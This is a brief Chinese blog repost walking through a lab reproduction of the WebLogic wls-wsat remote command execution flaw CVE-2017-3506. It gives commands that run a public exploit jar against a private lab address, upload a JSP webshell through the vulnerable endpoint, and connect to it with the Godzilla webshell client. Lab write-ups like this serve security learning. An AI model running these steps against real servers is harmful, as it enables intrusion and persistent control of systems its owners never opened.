【精选】WebLogic-CVE-2017-3506
2023-12-13 08:17:57
下载地址:
https://github.com/Al1ex/CVE-2017-3506
https://github.com/Al1ex/CVE-2017-3506
1.weblogic wls-wsat组件远程命令执行(CVE-2017-3506)
复现:
┌──(root💀kali)-[~/routing/红日2/CVE-2017-3506-main]
└─# java -jar WebLogic-XMLDecoder.jar
先进行检测下漏洞是否存在
┌──(root💀kali)-[~/routing/红日2/CVE-2017-3506-main]
└─# java -jar WebLogic-XMLDecoder.jar -u http://192.168.111.129:7001
2.burp抓包
记得要在WebLogic-XMLDecoder.jar文件中的目录下进行执行,要不然会报错
proxychains -f /etc/proxychains4.conf java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.129:7001/ /wls-wsat/CoordinatorPortType11 shell.jsp
用123替换下burp里面的内容,然后进行测试下
3.哥斯拉连接
我们再访问下
文章来源:https://blog.csdn.net/SENMINGya/article/details/134840425
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!